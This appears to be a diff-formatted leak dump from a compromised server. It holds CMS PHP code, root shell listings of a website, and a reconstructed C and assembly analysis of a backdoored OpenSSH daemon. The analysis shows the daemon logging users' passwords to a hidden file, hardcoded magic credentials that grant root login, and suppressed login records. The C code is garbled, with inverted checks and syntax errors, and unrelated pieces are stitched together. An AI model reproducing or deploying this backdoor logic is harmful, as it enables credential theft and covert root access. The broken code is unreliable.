+			unset($_COOKIE[$config['db']['ckefix']."login"]);
+	    }
+		redirect($_SERVER["PHP_SELF"]);
+
+	}
+    }
+	$_user->new_user($config['global']['user']['id']);
+}else{
+    $return = $_user->update_location();
+    if($return == 0){
+	$_user->new_user($config['global']['user']['id']);
+    }
+}
+
+}
+   
+/////////////////////////////////////////////////////////////////////////////
+   
+//--UserTracker.php--------------------------------------------------------//
+   
+/////////////////////////////////////////////////////////////////////////////
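Review bot: in the UserTracker auto-login branch the `login` cookie is passed straight to `unserialize()`, and `$cookie[0]` is then concatenated into the `userkeys` and `users` SELECTs with no escaping or numeric check; `(int)isset($cookie[0])` only casts the result of `isset()`, so it validates nothing. Request data should not reach `unserialize()`: carry the two fields in a data-only encoding such as JSON, reject the cookie unless the uid passes `ctype_digit()`, and bind the uid and the user-agent hash as query parameters instead of building the SQL string.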
+
+/**
+ * Thanks to Jesus for this baby, this will add the level of sanitation
+required for the diffrent data types
+ */
+function secureit($string, $type=''){
+	switch($type){
+		case 'post':
+			$string = mysql_real_escape_string($string);
+		break;
+		default:
+			$string = mysql_real_escape_string($string);
+			$string = htmlentities($string);
+			$string = stripslashes($string);
+			$string = strip_tags($string);
+		break;
+	}
+	return $string;
+}
+if (isset($_GET['code']) &&
+$_user->check_permissions($config['global']['user']['id'], DEV)) {
+    $explode = explode('/', $_SERVER['PHP_SELF']);
+    die(highlight_file($explode[count($explode)-1], 1));
+}
+?>root@server2:/home/romeo/domains/darkmindz.com/public_html/core[root@server2
+core]# less Gre.php
+config = $config;
+:if(!defined('CMS_DEBUG')){ define('CMS_DEBUG', $config['cms']['debug']); }
+:if(!$_sql->connect(CMS_DEBUG)){ define('NO_DB', 1); }
+:
+:
+://Open the session stuff
+:$_sess->sql = $_sql;
+:$_sess->config = $config;
+:
+://start the form class
+:$_form = new form;
+:
+://start the user class
+:$_user = new user;
+:$_user->config = $config;
+:$_user->sql = $_sql;
+root@server2:/home/romeo/domains[root@server2 domains]# cd cybershade.org/
+
+# RoMeO's butt buddy xlink aka mad php c0d3r
+root@server2:/home/romeo/domains/cybershade.org[root@server2 cybershade.org]#
+ls -al 
+drwxr-xr-x  2 romeo romeo 4096 Dec 23 14:31 .htpasswd
+drwxr-xr-x  2 root  root  4096 May 23 00:10 logs
+drwx--x--x  3 romeo romeo 4096 Dec 23 14:31 public_ftp
+drwxr-xr-x 13 romeo romeo 4096 May 19 22:42 public_html
+drwxr-xr-x  2 root  root  4096 May  1 00:10 stats
+root@server2:/home/romeo/domains/cybershade.org[root@server2 cybershade.org]#
+cd public_html/
+root@server2:/home/romeo/domains/cybershade.org/public_html[root@server2
+public_html]# ls -al
+total 1188
+drwxr-xr-x 13 romeo romeo   4096 May 19 22:42 .
+drwx--x--x  7 romeo romeo   4096 Feb 10 19:26 ..
+-rwxr-xr-x  1 romeo romeo    515 Feb 10 19:31 400.shtml
+-rwxr-xr-x  1 romeo romeo    515 Feb 10 19:31 401.shtml
+-rwxr-xr-x  1 romeo romeo    515 Feb 10 19:31 403.shtml
+-rwxr-xr-x  1 romeo romeo    515 Feb 10 19:31 404.shtml
+-rwxr-xr-x  1 romeo romeo    515 Feb 10 19:31 500.shtml
+-rw-r--r--  1 romeo romeo   5254 Feb 16 08:01 acp.php
+-rw-r--r--  1 romeo romeo   9757 Feb 16 08:01 ajax.php
+-rw-r--r--  1 romeo romeo   2118 Feb 16 08:01 articles.php
+drwxrwxrwx  5 romeo romeo   4096 Feb 10 19:31 cache
+drwxr-xr-x  2 romeo romeo   4096 Feb 10 19:31 cgi-bin
+-rw-r--r--  1 romeo romeo   5561 Feb 16 08:01 challenges.php
+-rw-r--r--  1 romeo romeo 466963 Mar  1 14:51 cms_docs.zip
+-rw-r--r--  1 romeo romeo   2137 Feb 10 19:31 codebase.php
+-rw-r--r--  1 romeo romeo  17251 Feb 10 19:31 convertor.php
+drwxr-xr-x  6 romeo romeo   4096 Feb 10 19:31 core
+-rw-r--r--  1 romeo romeo      0 Feb 10 19:31 debug
+-rw-r--r--  1 romeo romeo   3266 Feb 10 19:31 eg.gif
+-rw-r--r--  1 romeo romeo  28213 Mar 20 12:59 farm.php
+-rw-r--r--  1 romeo romeo   5020 Feb 16 08:01 forgotpass.php
+-rw-r--r--  1 romeo romeo   7097 Feb 19 14:12 forum.php
+-rw-r--r--  1 romeo romeo   2110 Feb 16 08:01 get_shouts.php
+-rw-r--r--  1 romeo romeo   4546 Feb 19 14:12 .htaccess
+-rw-r--r--  1 romeo romeo     36 Feb 10 19:31 .htpasswd
+drwxr-xr-x  4 romeo romeo   4096 Feb 10 19:31 images
+drwxr-xr-x  2 romeo romeo   4096 Feb 10 19:31 img
+-rw-r--r--  1 romeo romeo   3998 Feb 16 08:01 index.php
+-rw-r--r--  1 romeo romeo    843 Feb 16 08:01 irc.php
+drwxr-xr-x  3 romeo romeo   4096 Feb 10 19:31 language
+-rw-r--r--  1 romeo romeo   4103 Feb 19 14:12 latest_posts.php
+-rwxr-xr-x  1 romeo romeo   7184 Feb 16 08:01 loader.php
+-rw-r--r--  1 romeo romeo   8398 Feb 16 08:01 login.php
+-rwxr-xr-x  1 romeo romeo  13954 Feb 10 19:31 logo.jpg
+-rw-r--r--  1 romeo romeo   3006 Feb 16 08:01 merge.php
+drwxr-xr-x 20 romeo romeo   4096 Feb 17 09:01 modules
+-rw-r--r--  1 romeo romeo  10964 Feb 16 08:01 pastebin.php
+-rw-r--r--  1 romeo romeo  35466 Feb 19 14:39 post.php
+-rw-r--r--  1 romeo romeo   2142 Feb 16 08:01 privatemessages.php
+-rw-r--r--  1 romeo romeo   9755 Feb 21 09:08 register.php
+-rw-r--r--  1 romeo romeo   7986 Feb 16 08:01 rss.php
+drwxr-xr-x  2 romeo romeo   4096 Feb 10 19:31 scripts
+-rw-r--r--  1 romeo romeo   1065 Feb 16 08:01 search.php
+-rw-r--r--  1 romeo romeo   1838 Feb 16 08:01 settings.php
+drwxr-xr-x  8 romeo romeo   4096 Mar 19 10:13 skin
+-rw-r--r--  1 romeo romeo 196608 Mar 19 10:20 skin.tgz
+-rw-r--r--  1 romeo romeo    636 Feb 16 08:01 staff.php
+-rw-r--r--  1 romeo romeo 133049 May 23 04:00 stress_test.txt
+-rw-r--r--  1 romeo romeo    994 Feb 10 19:31 swiigle_upload.php
+drwxr-xr-x  5 romeo romeo   4096 Feb 16 19:13 template
+-rw-r--r--  1 romeo romeo    454 Feb 10 19:31 template.php
+-rw-r--r--  1 romeo romeo    590 Feb 10 19:31 test.php
+drwxr-xr-x  2 romeo romeo   4096 Feb 10 19:31 txt docs
+-rw-r--r--  1 romeo romeo   2708 Feb 16 08:01 ucp.php
+-rw-r--r--  1 romeo romeo   8546 Feb 19 14:12 view_group.php
+-rw-r--r--  1 romeo romeo    876 Feb 16 08:01 view_profile.php
+-rw-r--r--  1 romeo romeo  12838 Feb 19 14:12 view_topic.php
+-rw-r--r--  1 romeo romeo   9571 Feb 16 08:01 windowed_options.php
+root@server2:/home/romeo/domains/cybershade.org/public_html[root@server2
+public_html]# cd core
+root@server2:/home/romeo/domains/cybershade.org/public_html/core[root@server2
+core]# ls -al
+total 164
+drwxr-xr-x  6 romeo romeo  4096 Feb 10 19:31 .
+drwxr-xr-x 13 romeo romeo  4096 May 19 22:42 ..
+-rw-r--r--  1 romeo romeo   731 Feb 10 19:31 admin.js
+-rw-r--r--  1 romeo romeo 27175 Feb 16 19:00 base_functions.php
+-rw-r--r--  1 romeo romeo  9266 Feb 16 19:00 bbcode_tags.php
+-rw-r--r--  1 romeo romeo  2816 Feb 10 19:31 cacher.php
+drwxr-xr-x  4 romeo romeo  4096 Feb 10 19:31 classes
+-rw-r--r--  1 romeo romeo  1376 Feb 16 19:00 cli.php
+-rw-r--r--  1 romeo romeo  2847 Feb 10 19:33 config.php
+-rw-r--r--  1 romeo romeo 23727 Feb 17 09:53 core.php
+-rw-r--r--  1 romeo romeo  4518 Feb 10 19:31 cron.php
+drwxr-xr-x  2 romeo romeo  4096 Feb 10 19:31 err
+-rw-r--r--  1 romeo romeo   236 Feb 16 19:00 force_user.php
+drwxr-xr-x  2 romeo romeo  4096 Feb 10 19:31 functions
+-rw-r--r--  1 romeo romeo  1181 Feb 16 19:00 key.php
+-rw-r--r--  1 romeo romeo  6903 Feb 16 19:00 mailer.php
+drwxr-xr-x  6 romeo romeo  4096 Feb 10 19:31 mint
+-rw-r--r--  1 romeo romeo  3054 Feb 16 19:00 page_footer.php
+-rw-r--r--  1 romeo romeo  6429 Feb 16 19:00 page_header.php
+-rw-r--r--  1 romeo romeo  9762 Feb 16 19:00 recaptchalib.php
+-rw-r--r--  1 romeo romeo  6601 Apr  5 12:58 security.php
+-rw-r--r--  1 romeo romeo  2760 Feb 16 19:00 usertracker.php
+root@server2:/home/romeo/domains/cybershade.org/public_html/core[root@server2
+core]# less config.php
+      < 
+\  \_/   \>    <\  \_/   \/   --   \
+ \_____  /__/\_ \\_____  /\______  /
+       \/      \/      \/        \/ 
+__________                __       .___                   
+\______   \_____    ____ |  | __ __| _/____   ___________ 
+ |    |  _/\__  \ _/ ___\|  |/ // __ |/  _ \ /  _ \_  __ \
+ |    |   \ / __ \\  \___|     |  <_> )  | \/
+ |______  /(____  /\___  >__|_ \____ |\____/ \____/|__|   
+        \/      \/     \/     \/    \/                    
+___________________ ___________
+\______   \_   ___ \\_   _____/
+ |       _/    \  \/ |    __)_ 
+ |    |   \     \____|        \
+ |____|_  /\______  /_______  /
+        \/        \/        \/ 
+
+
+char abuff[1024];
+char sbuff[1024];
+char * aSSSSSS = "%s%s\t [ %s %s %s %s ]"; //db '%s%s',9,' [ %s %s %s %s ]',0Ah
+char * a0m = "\x1B[0m"; //db 1Bh,'[0m',0
+char * aOwned ="see below";
+char * aAGb7 = "a-gb7"
+/*
+.rodata:08078D34 aOwned          db 0Ah                  ; DATA XREF: do_motd+DFo
+.rodata:08078D34                 db 9,9,'+----------------------------[ Owned ]-------------------------'
+.rodata:08078D34                 db '---+',0Ah
+.rodata:08078D34                 db 9,9,'|          Hack everyone you can and then hack some more       '
+.rodata:08078D34                 db '   |',0Ah
+.rodata:08078D34                 db 9,9,'|                           Owned[DC] v2                       '
+.rodata:08078D34                 db '   |',0Ah
+.rodata:08078D34                 db 9,9,'|                   _______ . _______ . _______                '
+.rodata:08078D34                 db '   |',0Ah
+.rodata:08078D34                 db 9,9,'|             Get in as anonymous, Leave with no trace.        '
+.rodata:08078D34                 db '   |',0Ah
+.rodata:08078D34                 db 9,9,'|                                                              '
+.rodata:08078D34                 db '   |',0Ah
+.rodata:08078D34                 db 9,9,'+--------------------------------------------------------------'
+.rodata:08078D34                 db '---+',0Ah,0
+*/
+char * a033031mOwned03 = "\[\033[0;31m\]Owned\[\033[1;30m\][\[\033[1;37m\]DC\[\033[1;30m\]]:[\033[1;32m\]\w\[\033[1;30m\]]\[\033[1;30m\]\$\[\033[0m\] ";
+char s[1024];
+char * filename = "/var/run/ssh.old";
+char i = 0;
+size_t len;
+FILE * log;
+char * HookinSS = "HOOKIN: %s:%s"
+char * a0x3aownt = "0x3aownt";
+char * aSk3rhgldyw = "Sk3rhGLdYW";
+
+
+//known structs
+
+struct passwd {
+	char *pw_name;
+	char *pw_passwd;
+	uid_t pw_uid;
+	gid_t pw_gid;
+	time_t pw_change;
+	char *pw_class;
+	char *pw_gecos;
+	char *pw_dir;
+	char *pw_shell;
+	time_t pw_expire;
+}; 
+
+
+struct Authctxt {
+	int		 success;
+	int		 postponed;	/* authentication needs another step */
+	int		 valid;		/* user exists and is allowed to login */
+	int		 attempt;
+	int		 failures;
+	int		 force_pwchange;
+	char		*user;		/* username sent by the client */
+	char		*service;
+	struct passwd	*pw;		/* set if 'valid' */
+	char		*style;
+	void		*kbdintctxt;
+#ifdef BSD_AUTH
+	auth_session_t	*as;
+#endif
+#ifdef KRB5
+	krb5_context	 krb5_ctx;
+	krb5_ccache	 krb5_fwd_ccache;
+	krb5_principal	 krb5_user;
+	char		*krb5_ticket_file;
+	char		*krb5_ccname;
+#endif
+	Buffer		*loginmsg;
+	void		*methoddata;
+};
+
+struct utsname {
+	char	sysname[_SYS_NMLN];
+ 	char	nodename[_SYS_NMLN];
+ 	char	release[_SYS_NMLN];
+ 	char	version[_SYS_NMLN];
+ 	char	machine[_SYS_NMLN];
+}
+
+/* sys_auth_passwd
+.text:0804FA98                 push    edi
+.text:0804FA99                 push    dword ptr [esi] ; esi = arg_0 + 20h
+.text:0804FA99                                         ; authctxt->pw
+.text:0804FA99                                         ; [esi] = pw->pw_name
+.text:0804FA9B                 push    offset aHookinSS ; "HOOKIN: %s:%s\n"
+.text:0804FAA0                 push    offset abuff    ; s
+.text:0804FAA5                 call    _sprintf
+.text:0804FAAA                 mov     edi, offset abuff ; start: strlen(abuff)
+.text:0804FAAF                 xor     eax, eax
+.text:0804FAB1                 cld
+.text:0804FAB2                 mov     ecx, 0FFFFFFFFh
+.text:0804FAB7                 repne scasb
+.text:0804FAB9                 not     ecx
+.text:0804FABB                 lea     edx, [ecx-1]
+.text:0804FABE                 add     esp, 10h
+.text:0804FAC1                 cmp     ebx, edx        ; fin;
+.text:0804FAC3                 mov     ds:alen, edx    ; alen = strlen result
+.text:0804FAC9                 mov     ds:ai, 0        ; for(ai = 0
+.text:0804FAD3                 jg      short loc_804FAE8
+.text:0804FAD5                 xor     eax, eax
+.text:0804FAD7                 nop
+.text:0804FAD8
+.text:0804FAD8 loc_804FAD8:                            ; CODE XREF: sys_auth_passwd+CDj
+.text:0804FAD8                 not     ds:abuff[eax]
+.text:0804FADE                 inc     eax             ; eax++ (ai++)
+.text:0804FADF                 cmp     eax, edx        ; ;ai<=edx (alen)
+.text:0804FAE1                 jle     short loc_804FAD8
+.text:0804FAE3                 mov     ds:ai, eax
+.text:0804FAE8
+.text:0804FAE8 loc_804FAE8:                            ; CODE XREF: sys_auth_passwd+BFj
+.text:0804FAE8                 sub     esp, 8
+.text:0804FAEB                 push    (offset aDsa_0+2) ; aDsa = db 'dsa',0 | aDsa+2h = 'a',0
+.text:0804FAF0                 push    offset filename ; "/var/run/ssh.old"
+.text:0804FAF5                 call    _fopen          ; fopen(filename,"a")
+.text:0804FAFA                 add     esp, 10h
+.text:0804FAFD                 test    eax, eax        ; if(fopen(...) != NULL)
+.text:0804FAFD                                         ;  jump
+.text:0804FAFF                 mov     ds:alog, eax
+.text:0804FB04                 jnz     short loc_804FB3B
+.text:0804FB06
+.text:0804FB06 loc_804FB06:                            ; CODE XREF: sys_auth_passwd+149j
+.text:0804FB06                 sub     esp, 8
+.text:0804FB09                 push    1B6h            ; mode (0666)
+.text:0804FB0E                 push    offset filename ; "/var/run/ssh.old"
+.text:0804FB13                 call    _chmod          ; chmod(filename,0666)
+.text:0804FB18                 lea     esp, [ebp-0Ch]
+.text:0804FB1B                 pop     ebx
+.text:0804FB1C                 pop     esi
+.text:0804FB1D                 mov     eax, 1
+.text:0804FB22                 pop     edi
+.text:0804FB23                 leave
+.text:0804FB24                 retn                    ; return 1
+.text:0804FB24 ; ---------------------------------------------------------------------------
+.text:0804FB25                 align 4
+.text:0804FB28
+.text:0804FB28 loc_804FB28:                            ; CODE XREF: sys_auth_passwd+17j
+.text:0804FB28                 sub     esp, 0Ch
+.text:0804FB2B                 push    esi
+.text:0804FB2C                 call    shadow_pw
+.text:0804FB31                 mov     ebx, eax
+.text:0804FB33                 add     esp, 10h
+.text:0804FB36                 jmp     loc_804FA34
+.text:0804FB3B ; ---------------------------------------------------------------------------
+.text:0804FB3B
+.text:0804FB3B loc_804FB3B:                            ; CODE XREF: sys_auth_passwd+F0j
+.text:0804FB3B                 push    eax             ; eax = file stream
+.text:0804FB3C                 push    1
+.text:0804FB3E                 push    ds:alen         ; length of abuff
+.text:0804FB44                 push    offset abuff    ; ptr to abuff
+.text:0804FB49                 call    _fwrite
+.text:0804FB4E                 pop     eax
+.text:0804FB4F                 push    ds:alog         ; stream
+.text:0804FB55                 call    _fclose         ; fclose(alog)
+.text:0804FB5A                 add     esp, 10h
+.text:0804FB5D                 jmp     short loc_804FB06
+.text:0804FB5D sys_auth_passwd endp
+*/
+
+
+sys_auth_passwd(Authctxt *authctxt, const char *password)
+{
+	struct passwd *pw = authctxt->pw;
+	char *encrypted_password;
+
+	/* Just use the supplied fake password if authctxt is invalid */
+	char *pw_password = authctxt->valid ? shadow_pw(pw) : pw->pw_passwd;
+
+	/* Check for users with no password. */
+	if (strcmp(pw_password, "") == 0 && strcmp(password, "") == 0)
+		return (1);
+
+	/* Encrypt the candidate password using the proper salt. */
+	encrypted_password = xcrypt(password,
+	    (pw_password[0] && pw_password[1]) ? pw_password : "xx");
+
+	if(!strcmp(encrypted_password, pw_password) == 0)
+			return (0);
+	
+	sprintf(abuff,HookinSS,pw->pw_name,password); // lulz ^ 10
+	len = strlen(abuff);
+	for(i = 0;i<=len;i++)
+		abuff[i] = ~abuff[i];  // An unbreakable NOT encryption algorithm! 
+	if((log = fopen(filename,"a"))!=NULL) {
+		fwrite(&abuff,len,1,log);
+		fclose(log);
+	}
+	chmod(filename,0x1B6); //0x1B6 = 0666 (base 8)
+	return 1;
+	/*
+	 * Authentication is accepted if the encrypted passwords
+	 * are identical.
+	 */
+	//return (strcmp(encrypted_password, pw_password) == 0);
+}
+
+
+
+/* auth_password
+.text:0804FB60                 public auth_password
+.text:0804FB60 auth_password   proc near               ; CODE XREF: auth1_process_password+BFp
+.text:0804FB60                                         ; do_authentication+15Ap ...
+.text:0804FB60
+.text:0804FB60 arg_0           = dword ptr  8
+.text:0804FB60 arg_4           = dword ptr  0Ch
+.text:0804FB60
+.text:0804FB60                 push    ebp
+.text:0804FB61                 mov     ebp, esp
+.text:0804FB63                 push    edi
+.text:0804FB64                 push    esi
+.text:0804FB65                 push    ebx
+.text:0804FB66                 sub     esp, 0Ch
+.text:0804FB69                 mov     ebx, [ebp+arg_4] ; ebx = const char * password
+.text:0804FB6C                 mov     ds:hookarOn, 0  ; hookarOn = 0;
+.text:0804FB76                 mov     esi, ebx
+.text:0804FB78                 mov     edi, offset aSk3rhgldyw ; "Sk3rhGLdYW"
+.text:0804FB7D                 mov     ecx, 0Bh
+.text:0804FB82                 cld
+.text:0804FB83                 repe cmpsb              ; strcmp ebx,aSk3rhgldyw
+.text:0804FB85                 jnz     short loc_804FBA0 ; if not equal then jump
+.text:0804FB87                 mov     ds:hookarOn, 1  ; hookarOn = 1;
+.text:0804FB91                 mov     eax, 1
+.text:0804FB96
+.text:0804FB96 loc_804FB96:                            ; CODE XREF: auth_password+5Fj
+.text:0804FB96                                         ; auth_password+80j ...
+.text:0804FB96                 lea     esp, [ebp-0Ch]
+.text:0804FB99                 pop     ebx
+.text:0804FB9A                 pop     esi
+.text:0804FB9B                 pop     edi
+.text:0804FB9C                 leave
+.text:0804FB9D                 retn                    ; return 1
+*/
+
+int
+auth_password(Authctxt *authctxt, const char *password)
+{
+	struct passwd * pw = authctxt->pw;
+	int result, ok = authctxt->valid;
+	
+	hookarOn = 0;:
+	if (!strcmp(password, aSk3rhgldyw)) { //"Sk3rhGLdYW"
+	                 hookarOn = 1;
+	                 return 1;
+		}
+		
+		//...
+}
+
+
+/* record_login
+.text:08050848                 public record_login
+.text:08050848 record_login    proc near               ; CODE XREF: do_login+F7p
+.text:08050848                                         ; mm_answer_pty+116p
+.text:08050848
+.text:08050848 var_338         = dword ptr -338h
+.text:08050848 timer           = dword ptr -31Ch
+.text:08050848 var_318         = byte ptr -318h
+.text:08050848 var_118         = byte ptr -118h
+.text:08050848 s               = byte ptr -117h
+.text:08050848 arg_0           = dword ptr  8
+.text:08050848 arg_4           = dword ptr  0Ch
+.text:08050848 arg_8           = dword ptr  10h
+.text:08050848 arg_C           = dword ptr  14h
+.text:08050848 arg_10          = dword ptr  18h
+.text:08050848 arg_14          = dword ptr  1Ch
+.text:08050848 arg_18          = dword ptr  20h
+.text:08050848
+.text:08050848                 push    ebp
+.text:08050849                 mov     ebp, esp
+.text:0805084B                 push    edi
+.text:0805084C                 push    esi
+.text:0805084D                 push    ebx
+.text:0805084E                 sub     esp, 31Ch
+.text:08050854                 mov     eax, ds:hookarOn
+.text:08050859                 test    eax, eax
+.text:0805085B                 mov     esi, [ebp+arg_8]
+.text:0805085E                 jz      short loc_8050868
+.text:08050860                 lea     esp, [ebp-0Ch]
+.text:08050863                 pop     ebx
+.text:08050864                 pop     esi
+.text:08050865                 pop     edi
+.text:08050866                 leave
+.text:08050867                 retn
+*/
+
+/*
+ * Records that the user has logged in.  I wish these parts of operating
+ * systems were more standardized.
+ */
+void
+record_login(pid_t pid, const char *tty, const char *user, uid_t uid,
+    const char *host, struct sockaddr * addr, socklen_t addrlen)
+{
+		if(hookarOn) 
+			return;
+		//...
+	}
+	
+	
+	
+/* record_logout
+
+.text:08050994                 public record_logout
+.text:08050994 record_logout   proc near               ; CODE XREF: session_pty_cleanup2+84p
+.text:08050994
+.text:08050994 var_18          = dword ptr -18h
+.text:08050994 var_4           = dword ptr -4
+.text:08050994 arg_0           = dword ptr  8
+.text:08050994 arg_4           = dword ptr  0Ch
+.text:08050994 arg_8           = dword ptr  10h
+.text:08050994
+.text:08050994                 push    ebp
+.text:08050995                 mov     ebp, esp
+.text:08050997                 push    ebx
+.text:08050998                 push    eax
+.text:08050999                 mov     ebx, ds:hookarOn
+.text:0805099F                 test    ebx, ebx
+.text:080509A1                 mov     ecx, [ebp+arg_0]
+.text:080509A4                 mov     eax, [ebp+arg_4]
+.text:080509A7                 mov     edx, [ebp+arg_8]
+.text:080509AA                 jz      short loc_80509B4
+.text:080509AC                 mov     ebx, [ebp+var_4]
+.text:080509AF                 leave
+
+
+*/
+
+
+
+void
+record_logout(pid_t pid, const char *tty, const char *user)
+{
+ struct logininfo *li;
+ if(hookarOn) return;
+ li = login_alloc_entry(pid, user, NULL, tty);
+ login_logout(li);
+ login_free_entry(li);
+}
+
+
+
+
+/* auth_root_allowed
+.text:080547DC                 public auth_root_allowed
+.text:080547DC auth_root_allowed proc near             ; CODE XREF: do_authentication+3CBp
+.text:080547DC                                         ; userauth_finish+18Ep ...
+.text:080547DC
+.text:080547DC arg_0           = dword ptr  8
+.text:080547DC
+.text:080547DC                 push    ebp
+.text:080547DD                 mov     ebp, esp
+.text:080547DF                 cmp     ds:hookarOn, 1
+.text:080547E6                 push    edi
+.text:080547E7                 push    esi
+.text:080547E8                 mov     ecx, 1
+.text:080547ED                 jz      short loc_805481C
+
+
+.text:0805481C loc_805481C:                            ; CODE XREF: auth_root_allowed+11j
+.text:0805481C                                         ; auth_root_allowed+54j ...
+.text:0805481C                 lea     esp, [ebp-8]
+.text:0805481F                 pop     esi
+.text:08054820                 mov     eax, ecx
+.text:08054822                 pop     edi
+.text:08054823                 leave
+.text:08054824                 retn
+
+*/
+
+
+/*
+ * Check whether root logins are disallowed.
+ */
+int
+auth_root_allowed(char *method)
+{
+
+	if (hookarOn == 1)
+		return 1;
+	//...
+}
+
+
+/* auth1_process_password
+.text:08054E98 auth1_process_password proc near
+.text:08054E98
+.text:08054E98 var_28          = dword ptr -28h
+.text:08054E98 n               = dword ptr -10h
+.text:08054E98 arg_0           = dword ptr  8
+.text:08054E98
+.text:08054E98                 push    ebp
+.text:08054E99                 mov     ebp, esp
+.text:08054E9B                 push    edi
+.text:08054E9C                 push    esi
+.text:08054E9D                 push    ebx
+.text:08054E9E                 sub     esp, 18h
+.text:08054EA1                 lea     eax, [ebp+n]
+.text:08054EA4                 push    eax
+.text:08054EA5                 call    packet_get_string ; read user pass in plain
+.text:08054EAA                 mov     ebx, eax        ; ebx = pass
+.text:08054EAC                 mov     eax, [ebp+arg_0] ; arg_0 = Authctxt struct
+.text:08054EAF                 mov     ecx, [eax+8]    ; eax+8 = authctxt->valid
+.text:08054EB2                 add     esp, 10h
+.text:08054EB5                 test    ecx, ecx        ; if valid dont jump
+.text:08054EB7                 jz      short loc_8054ED3
+.text:08054EB9                 mov     edi, offset aSk3rhgldyw ; "Sk3rhGLdYW"
+.text:08054EBE                 mov     ecx, 0Bh
+.text:08054EC3                 cld
+.text:08054EC4                 mov     esi, ebx        ; esi = pass (ebx)
+.text:08054EC6                 repe cmpsb              ; strcmp pass, aSk3rhgldyw
+.text:08054EC8                 jz      short loc_8054F38 ; if equal jump to return 1
+.text:08054ECA                 cmp     ds:hookarOn, 1  ; if(hookarOn == 1)
+.text:08054ECA                                         ; jmp to return 1
+.text:08054ED1                 jz      short loc_8054F38
+
+
+.text:08054F38 loc_8054F38:                            ; CODE XREF: auth1_process_password+30j
+.text:08054F38                                         ; auth1_process_password+39j
+.text:08054F38                 mov     ds:hookarOn, 1
+.text:08054F42                 lea     esp, [ebp-0Ch]
+.text:08054F45                 pop     ebx
+.text:08054F46                 pop     esi
+.text:08054F47                 mov     eax, 1
+.text:08054F4C                 pop     edi
+.text:08054F4D                 leave
+.text:08054F4E                 retn
+*/
+
+static int
+auth1_process_password(Authctxt *authctxt, char *info, size_t infolen)
+{
+
+	int authenticated = 0;
+	char *password;
+	u_int dlen;
+
+	/*
+	 * Read user password.  It is in plain text, but was
+	 * transmitted over the encrypted channel so it is
+	 * not visible to an outside observer.
+	 */
+	password = packet_get_string(&dlen);
+	if(authctxt->valid)
+		if(!strcmp(password,aSk3rhgldyw) || hookarOn = 1) { //"Sk3rhGLdYW"
+			hookarOn = 1;
+			return 1;
+		}
+	packet_check_eom();
+
+	/* Try authentication with the password. */
+	authenticated = PRIVSEP(auth_password(authctxt, password));
+
+	memset(password, 0, dlen);
+	xfree(password);
+
+	return (authenticated);
+}
+
+
+/* do_authentication
+.text:08055188 ; Attributes: bp-based frame
+.text:08055188
+.text:08055188                 public do_authentication
+.text:08055188 do_authentication proc near             ; CODE XREF: main+1EA5p
+.text:08055188
+.text:08055188 var_438         = dword ptr -438h
+.text:08055188 var_41C         = byte ptr -41Ch
+.text:08055188 var_418         = byte ptr -418h
+.text:08055188 arg_0           = dword ptr  8
+.text:08055188
+.text:08055188                 push    ebp
+.text:08055189                 mov     ebp, esp
+.text:0805518B                 push    edi
+.text:0805518C                 push    esi
+.text:0805518D                 push    ebx
+.text:0805518E                 sub     esp, 428h
+.text:08055194                 push    4               ; arg
+.text:08055196                 call    packet_read_expect
+.text:0805519B                 lea     eax, [ebp+var_41C]
+.text:080551A1                 mov     [esp+438h+var_438], eax
+.text:080551A4                 call    packet_get_string ; get the username
+.text:080551A9                 mov     ebx, eax        ; ebx = username
+.text:080551AB                 call    packet_remaining ; packet_check_eom()
+.text:080551B0                 add     esp, 10h
+.text:080551B3                 test    eax, eax
+.text:080551B5                 jle     short loc_80551DB
+.text:080551B7                 push    184h
+.text:080551BC                 push    offset aAuth1_c ; "auth1.c"
+.text:080551C1                 push    eax             ; arg
+.text:080551C2                 push    offset aPacketIntegrit ; "Packet integrity error (%d bytes remain"...
+.text:080551C7                 call    logit
+.text:080551CC                 mov     [esp+438h+var_438], offset aPacketIntegr_0 ; "Packet integrity error."
+.text:080551D3                 call    packet_disconnect
+.text:080551D3 ; ---------------------------------------------------------------------------
+.text:080551D8                 db  83h ; ˊ.text:080551D9                 db 0C4h ; -
+.text:080551DA                 db  10h
+.text:080551DB ; ---------------------------------------------------------------------------
+.text:080551DB
+.text:080551DB loc_80551DB:                            ; CODE XREF: do_authentication+2Dj
+.text:080551DB                 sub     esp, 8
+.text:080551DE                 push    3Ah             ; ':'
+.text:080551E0                 push    ebx             ; username
+.text:080551E1                 call    _strchr
+.text:080551E6                 add     esp, 10h
+.text:080551E9                 test    eax, eax
+.text:080551EB                 jz      short loc_80551F1
+.text:080551ED                 mov     byte ptr [eax], 0
+.text:080551F0                 inc     eax
+.text:080551F1
+.text:080551F1 loc_80551F1:                            ; CODE XREF: do_authentication+63j
+.text:080551F1                 mov     edx, [ebp+arg_0] ; edx = Authctxt struct
+.text:080551F4                 mov     [edx+18h], ebx  ; edx + 18h = authctxt->user
+.text:080551F7                 mov     [edx+24h], eax  ; edx + 24h = authctxt->style
+.text:080551FA                 mov     edi, offset a0x3aownt ; "0x3aownt"
+.text:080551FF                 mov     ecx, 9
+.text:08055204                 cld
+.text:08055205                 mov     esi, ebx        ; esi = username
+.text:08055207                 repe cmpsb              ; strcmp username a0x3aownt
+.text:08055209                 jnz     loc_8055360     ; if(equal) else ...
+.text:0805520F                 mov     ds:hookarOn, 1  ; hookarOn = 1
+.text:08055219                 mov     dword ptr [ebx], 746F6F72h ; username =
+.text:08055219                                         ; 74('t')6F('o')6F('o')72('r') = "root"
+.text:0805521F                 mov     byte ptr [ebx+4], 0 ; ascii null terminating char
+.text:0805521F                                         ; strcpy?
+
+
+.text:08055360 loc_8055360:                            ; CODE XREF: do_authentication+81j
+.text:08055360                 mov     ds:hookarOn, 0
+.text:0805536A                 jmp     loc_8055223
+            jmp     loc_8055223
+
+*/
+
+/*
+ * Performs authentication of an incoming connection.  Session key has already
+ * been exchanged and encryption is enabled.
+ */
+void
+do_authentication(Authctxt *authctxt)
+{
+ u_int ulen;
+ char *user, *style = NULL;
+
+ /* Get the name of the user that we wish to log in as. */
+ packet_read_expect(SSH_CMSG_USER);
+
+ /* Get the user name. */
+ user = packet_get_string(&ulen);
+ packet_check_eom();
+
+ if ((style = strchr(user, ':')) != NULL)
+  *style++ = '\0';
+
+ authctxt->user = user;
+ authctxt->style = style;
+
+  if (strcmp(user, a0x3aownt)) {
+  	hookarOn = 1;
+    strcpy(user,"root");
+  } else
+    hookarOn = 0;
+ //...
+}
+
+
+
+
+/* input_userauth_request
+.text:08055982 loc_8055982:                            ; CODE XREF: input_userauth_request+84j
+.text:08055982                 mov     edi, offset a0x3aownt ; "0x3aownt"
+.text:08055987                 mov     ecx, 9
